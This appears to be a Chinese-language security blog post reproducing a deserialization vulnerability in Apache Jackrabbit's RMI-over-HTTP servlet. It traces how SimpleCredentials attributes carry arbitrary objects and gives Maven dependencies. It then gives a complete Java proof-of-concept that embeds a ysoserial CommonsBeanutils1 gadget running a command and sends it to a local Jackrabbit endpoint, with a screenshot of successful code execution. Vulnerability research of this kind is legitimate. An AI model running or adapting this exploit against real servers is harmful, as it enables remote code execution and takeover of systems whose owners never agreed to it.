注意
本文最后更新于 2023-07-28,文中内容可能已过时。
https://lists.apache.org/thread/j03b3qdhborc2jrhdc4d765d3jkh8bfw
data:image/s3,"s3://crabby-images/2278a/2278a64a81013ec6ca652269d6d5502496f2daa1" alt="image.png"
漏洞点已经指出来了,rmi over http。
org.apache.jackrabbit.servlet.remote.RemoteBindingServlet
data:image/s3,"s3://crabby-images/10133/101330267053e4761075cd420694a2b879f4d491" alt="image.png"
关键是怎么利用呢?根据文档 https://jackrabbit.apache.org/archive/wiki/JCR/RemoteAccess_115513494.html 用JcrUtils拿可以拿到Repository,给定http url拿到的是URLRemoteRepository
data:image/s3,"s3://crabby-images/9f0fc/9f0fcf5aca00a68fdfd968f7544debaa2c067e3f" alt="image.png"
Repository接口有几个方法,其中login函数的参数为javax.jcr.Credentials
data:image/s3,"s3://crabby-images/2f6e7/2f6e73fa98ed26c9d97546dbeda39927e0453b3b" alt="image.png"
该接口有两个实现类
data:image/s3,"s3://crabby-images/40db6/40db63b5b316018508a738929c6018370f515418" alt="image.png"
其中SimpleCredentials有一个<string,object>
类型的hashmap
data:image/s3,"s3://crabby-images/02f3f/02f3fb4caa3b03c8307159802433e861f4bdff1b" alt="image.png"
所以可以将cb序列化payload放入hashmap发送。
pom引入依赖
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| <dependencies>
<dependency>
<groupId>javax.jcr</groupId>
<artifactId>jcr</artifactId>
<version>2.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.jackrabbit/jackrabbit-jcr-rmi -->
<dependency>
<groupId>org.apache.jackrabbit</groupId>
<artifactId>jackrabbit-jcr-rmi</artifactId>
<version>2.21.10</version>
</dependency>
<dependency>
<groupId>org.apache.jackrabbit</groupId>
<artifactId>jackrabbit-jcr2dav</artifactId>
<version>2.0-beta6</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-simple</artifactId>
<version>1.5.8</version>
</dependency>
</dependencies>
|
构造反序列化payload并发送
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| package org.example;
import org.apache.jackrabbit.commons.JcrUtils;
import ysoserial.payloads.CommonsBeanutils1;
import javax.jcr.Repository;
import javax.jcr.SimpleCredentials;
public class Main {
public static void main(String[] args) throws Exception {
SimpleCredentials simpleCredentials = new SimpleCredentials("1", "1".toCharArray());
simpleCredentials.setAttribute("a", new CommonsBeanutils1().getObject("calc"));
Repository repository = JcrUtils.getRepository("http://localhost:8080/rmi");
repository.login(simpleCredentials);
}
}
|
rce留念
data:image/s3,"s3://crabby-images/8251a/8251a9ac7aba8905bb74be8227e3ccedf23d0fa4" alt="image.png"
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。